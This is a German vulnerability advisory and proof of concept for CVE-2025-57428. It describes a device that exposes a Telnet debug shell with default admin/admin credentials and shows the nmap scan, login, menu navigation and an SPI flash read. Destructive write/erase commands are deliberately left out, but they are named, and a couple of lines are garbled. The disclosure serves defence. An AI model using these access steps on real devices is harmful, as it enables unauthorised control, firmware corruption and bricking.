
CVE-2025-57428
⚠️ Dieses Repository wird nur als Referenz für CVE-2025-57428 gepflegt.
Für andere Sicherheitshinweise und Updates siehe: security-advisories.
Dieses Gerät stellt eine Telnet-Debug-Schnittstelle (standardmäßig auf Port 23 aktiviert) bereit und akzeptiert Admin-Anmeldedaten (`admin`/`admin` standardmäßig). Nach der Authentifizierung bietet die Shell direkten Zugriff auf Low-Level-Befehle (insbesondere `spi` und `reg`), was zu willkürlicher Firmware-Beschädigung, Geräteausfall (Bricking) und Verlust von Funktionalität oder Sicherheitskonfiguration führen kann.
Hinweis: Ich lasse absichtlich Befehle aus, die destruktive Schreibvorgänge durchführen. Der folgende PoC bestätigt die Existenz und Zugänglichkeit der Schnittstelle, ohne einen fertigen nutzbaren Exploit bereitzustellen.
Scannen Sie das Gerät im LAN:
nmap -p 23 <device-ip>
Ergebnis: Port 23 (telnet) zeigt open.
Verbinden Sie sich per Telnet und authentifizieren Sie sich (Standard-Anmeldedaten):
telnet <device-ip>
# Login as: admin
# Password: admin
Nach dem Login wird ein Debug-Prompt CMD> angezeigt.
Verfügbare Befehle auflisten:
CMD>help
Die Hilfeausgabe zeigt die folgenden Menüs:
cfg net os
Wechseln Sie in das Menü os:
CMD>os
Listen Sie erneut die verfügbaren Befehle auf:
OS>help
Dieses Mal zeigt die Hilfeausgabe die folgenden Befehle:
thread mem spi reg cpuload cpubusy event
Die Verwendung von zeigt .
Beobachtungen:
Versuche, einen Sicherheitskontakt oder Supportkanal des ursprünglichen Herstellers zu finden, waren erfolglos. Das Produkt scheint ein umbenanntes Gerät unbekannter Herkunft zu sein.
Diese Informationen werden nur zu Bildungs- und Verteidigungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für einen Missbrauch dieser Informationen.
spispi <rd/wr/er> <addr> [len]Flash-Speicher auslesen:
OS>spi rd 0x000fd0f0 16
Dies gibt einen Hex-Dump des Flash-Bereichs zurück:
4f30650a 938f56fa 1b663a19 e316d824
Dies bestätigt, dass der Befehl funktioniert und die Shell Low-Level-Zugriff hat.
Der Schreibbefehl (spi wr) und der Löschbefehl (spi er) sowie die reg-Befehle sind ebenfalls ausführbar.